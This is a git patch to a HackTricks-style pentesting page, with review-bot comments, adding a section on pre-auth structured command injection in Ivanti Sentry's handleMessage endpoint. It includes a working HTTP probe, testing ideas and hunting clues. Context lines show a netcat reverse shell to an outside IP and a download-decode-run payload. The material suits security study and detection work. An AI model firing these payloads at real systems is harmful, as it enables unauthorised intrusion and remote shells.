From 2605e3d814f3f4f2886dab8d5cbe1cbc6f86a4b2 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Wed, 10 Jun 2026 15:34:42 +0000 Subject: [PATCH] Add content from: CVE-2026-10520 and CVE-2026-10523: Multiple Critical Vulnera... --- src/pentesting-web/command-injection.md | 51 +++++++++++++++++++++++++ 1 file changed, 51 insertions(+) diff --git a/src/pentesting-web/command-injection.md b/src/pentesting-web/command-injection.md index 41a11880d6a..870f6fd57c1 100644 --- a/src/pentesting-web/command-injection.md +++ b/src/pentesting-web/command-injection.md 
@@ -67,6 +67,54 @@ vuln=127.0.0.1%0anohup nc -e /bin/bash 51.15.192.49 80 vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod 744 /tmp/pay; /tmp/pay ``` +### Structured configuration-command injection in appliance APIs (Ivanti Sentry) + +Some appliance management planes do **not** pass attacker input straight into `/bin/sh`. Instead, they expose an HTTP endpoint that accepts what looks like a normal form field, but the backend parses it as a **trusted internal configuration command**. + +**Pattern seen in Ivanti Sentry:** + +- Unauthenticated POST endpoint: `/mics/api/v2/sentry/mics-config/handleMessage` +- User-controlled form field: `message` +- Backend tokenizes `message` into an internal verb / module / XPath / XML body +- The `execute system /configuration/system/commandexec` path reaches the native command-execution feature +- The command itself lives inside the XML-like `reqandres` field, so this is **structured command injection**, not just `;id`-style shell metacharacter abuse + +Minimal probe: + +```http +POST /mics/api/v2/sentry/mics-config/handleMessage HTTP/1.1 +Host: +Content-Type: application/x-www-form-urlencoded + +message=execute+system+%2Fconfiguration%2Fsystem%2Fcommandexec+%3Ccommandexec%3E%3Cindex%3E1%3C%2Findex%3E%3Creqandres%3Eid%3C%2Freqandres%3E%3C%2Fcommandexec%3E +``` + +Decoded shape: + +``` +message=execute system /configuration/system/commandexec 1id +``` + +What makes this interesting during review: + +1. **Verb-based dispatch**: user input is split into tokens such as `execute`, `system`, and an internal configuration path. +2. **Structured body parsing**: the trailing data is parsed as XML/config rather than treated as a plain argument. +3. **Privileged backend bridge**: the request reaches native/admin functionality intended for trusted internal workflows. +4. 
**No classic metacharacters required**: if filters only block `;`, `&&`, `|`, or `$()`, the bug still works because the payload is syntactically valid for the appliance's own parser. + +Testing ideas for similar products: + +- Enumerate **unauthenticated or weakly protected management/config endpoints** that accept verbs, config paths, XML fragments, or CLI-like mini languages. +- Diff patched builds for hardcoded replacement payloads or newly blocked paths; they often reveal the exact internal command grammar. +- Try legitimate-looking verbs such as `execute`, `test`, `import`, `query`, `apply`, `run`, or `diagnose` instead of shell separators. +- If the response returns structured XML/JSON, check whether your command output is embedded inside success fields rather than echoed raw. + +Hunting clues: + +- POSTs to `/mics/api/v2/sentry/mics-config/handleMessage` +- `Content-Type: application/x-www-form-urlencoded` with `message=` +- Tokens such as `execute system`, `/configuration/system/commandexec`, ``, `` + ### Bash arithmetic evaluation in RewriteMap/CGI-style scripts RewriteMap helpers written in **bash** sometimes push query params into globals and later compare them in **arithmetic contexts** (`[[ $a -gt $b ]]`, `$((...))`, `let`). Arithmetic expansion re-tokenizes the content, so attacker-controlled variable names or array references are expanded twice and can execute. 
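Review bot: in the "Decoded shape" block and the last "Hunting clues" bullet of this hunk, the XML element names have been lost: the decoded line reads `message=execute system /configuration/system/commandexec 1id` and the clue ends in two empty code spans, so the `commandexec`, `index` and `reqandres` tokens that the URL-encoded probe shows (`%3Ccommandexec%3E...%3Creqandres%3E`) never reach the reader. Write the angle-bracket tokens so they survive rendering (for example `&lt;commandexec&gt;` inside the code spans, or a fenced block tagged `xml`); as printed, the detection clues cannot be copied into a rule. Two smaller points for the same hunk: the body never names which CVE the handleMessage path corresponds to even though the new references list two (the watchTowr title ties the pre-auth command injection to CVE-2026-10520), so state the CVE id in the heading or first bullet; and the section gives no fixed version or mitigation, which a reader triaging a Sentry fleet will want, so add one line pointing at the fixed versions in the vendor advisory instead of leaving that to the references. The empty `Host:` header in the probe should also carry an explicit placeholder value.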
@@ -287,5 +335,8 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject - [HTB: Gavel](https://0xdf.gitlab.io/2026/03/14/htb-gavel.html) - [CVE-2023-27350.py (auth bypass + print scripting automation)](https://github.com/horizon3ai/CVE-2023-27350/blob/main/CVE-2023-27350.py) - [Unit 42 – Bash arithmetic expansion RCE in Ivanti RewriteMap scripts](https://unit42.paloaltonetworks.com/ivanti-cve-2026-1281-cve-2026-1340/) +- [Rapid7 – CVE-2026-10520, CVE-2026-10523 - Multiple critical vulnerabilities affecting Ivanti Sentry](https://www.rapid7.com/blog/post/etr-cve-2026-10520-cve-2026-10523-multiple-critical-vulnerabilities-affecting-ivanti-sentry) +- [watchTowr Labs – Ivanti Sentry Pre-Auth OS Command Injection (CVE-2026-10520)](https://labs.watchtowr.com/more-evidence-that-words-dont-mean-what-we-thought-they-meant-ivanti-sentry-pre-auth-os-command-injection-cve-2026-10520/) +- [Ivanti advisory – Ivanti Sentry (CVE-2026-10520 / CVE-2026-10523)](https://hub.ivanti.com/s/article/Security-Advisory-Ivanti-Sentry-CVE-2026-10520-CVE-2026-10523?language=en_US) {{#include ../banners/hacktricks-training.md}}
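Review bot: the three new reference entries mix dash styles: the Rapid7 entry uses ` - ` between the CVE list and the title, while the existing entries and the other two new ones use an en dash (`–`) after the source name, so change it to `Rapid7 – CVE-2026-10520, CVE-2026-10523: Multiple critical vulnerabilities affecting Ivanti Sentry` to match the list. The Ivanti advisory URL also carries a `?language=en_US` query string that no other link in the list has; check whether the advisory resolves without it and drop it if so, since locale parameters tend to change.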